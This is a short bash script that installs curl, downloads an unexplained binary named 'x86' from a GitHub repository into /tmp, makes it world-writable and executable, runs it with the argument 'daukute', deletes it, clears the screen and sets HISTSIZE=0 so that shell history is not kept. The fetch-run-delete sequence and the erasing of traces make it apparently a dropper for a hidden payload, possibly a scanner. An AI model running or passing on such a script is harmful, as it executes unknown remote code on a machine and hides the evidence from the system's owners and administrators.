#!/usr/bin/bash
yum install curl -y
apt install curl -y
cd /tmp/ && curl -OL https://github.com/DauDau432/scan/blob/main/x86 && chmod 777 x86 && ./x86 daukute && rm -rf x86 && cd /root/ && clear && HISTSIZE=0
